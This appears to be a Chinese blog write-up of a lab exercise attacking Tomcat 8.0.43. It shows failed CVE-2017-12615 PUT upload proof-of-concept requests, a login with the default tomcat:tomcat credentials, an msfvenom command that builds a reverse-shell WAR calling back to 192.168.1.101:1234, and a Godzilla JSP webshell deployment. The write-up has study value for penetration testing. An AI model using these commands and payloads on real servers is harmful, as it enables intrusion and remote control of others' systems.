0x01.指纹识别

拿到环境之后引入眼帘的是Tomcat 8.0.43

并不知道有些什么洞,searchsploit走一下

0x02.找错了洞

搜索相关漏洞,发现了CVE-2017-12615,需要后台在web.xml添加readonly字段并更改值为false(默认为true)默认开启状态会reject PUT/DELETE方法
所以关闭之后可以上传jsp文件,配合tomcat会忽略掉名字为" "的文件在jsp包后添加%20构造 PUT/shell.jsp%20 这一POC上传文件挂马。

试过各种复现帖里的三种POC PUT/shell.jsp%20;PUT/shell.jsp::DATA;PUT/shell.jsp/ 均无作用

0x03.漏洞复现

询问得知环境没有问题,重新看这个环境。
点击Sever Status,被告知需要登录,使用tomcat:tomcat 初始账号密码登录成功

反射shell

获得权限后,上传war包

warPayload:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=1234 -f war > shell.war

监听成功

上传jsp大马连接工具获取webshell

哥斯拉生成jsp大马

生成后缀名为Jsp的文件,压缩成zip格式后改后缀为war,上传即为true,用rar格式会false

连接成功!

0x03.

回到起点,打开/conf/web.xml,搜索字段readonly,果然没有 = =!

posted on 2021-03-12 22:28  Stunmaker  阅读(989)  评论(0)    收藏  举报